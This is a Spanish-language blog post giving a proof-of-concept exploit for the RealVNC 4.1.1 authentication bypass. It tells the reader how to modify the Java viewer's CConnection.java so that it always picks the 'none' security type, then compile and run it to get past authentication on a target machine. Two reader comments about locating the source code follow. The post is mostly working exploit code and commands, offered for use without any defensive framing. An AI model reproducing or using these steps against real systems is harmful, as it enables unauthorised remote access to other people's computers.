Prueba de Concepto: explotar el fallo de autentificación del servidor VNC de RealVNC 4.1.1.

Primero deberemos obtener las fuentes para poder modificarlas desde la web de RealVNC en este link: http://www.realvnc.com/cgi-bin/download.cgi y descargándonos VNC Free Edition Source Code for Java Version 4.1.


Una vez obtenidas las fuentes, procederemos a modificarlas. Para ello accederemos al fichero vnc-4_1-javasrc\java\rfb\CConnection.java, editamos el fichero y accedemos a la linea 229, donde encontraremos el siguiente código:


if (secType != SecTypes.invalid) {

os.writeU8(secType);

os.flush();

vlog.debug("Choosing security type "+SecTypes.name(secType)+

"("+secType+")");

}

}


Pues bien, este exploit es tan simple como añadir la siguiente línea:

if (secType != SecTypes.invalid) {

secType = SecTypes.none;

os.writeU8(secType);

os.flush();

vlog.debug("Choosing security type "+SecTypes.name(secType)+

"("+secType+")");

}

}



Voilá, ahora solo tenemos que compilar y ejecutar vncviewer mediante:

java.exe -jar vnc-4_1-javasrc\java\vncviewer.jar

La autentificación se salta y accedemos al equipo.

Posted on 12:28 a. m. by skarvin and filed under | 2 Comments »

2 comentarios:

Anónimo dijo... @ 8:37 a. m.

Es un artículo muy ineresante, pero ¿dónde puedo encontrar las fuentes del VNC? Ya no aparecen en la web. Un saludo.

skarvin dijo... @ 6:25 p. m.

Hola, parece que tienes que ir por otro sitio:

Lo que tienes que hacer es ir a:
http://www.realvnc.com/

Luego hacer click en:
http://www.realvnc.com/download.html

Despues en Free Edition - Download and Use y luego enProceed to download VNC Free Edition Source Code for Java
Version 4.1 - Full source code to Viewer

Un saludo!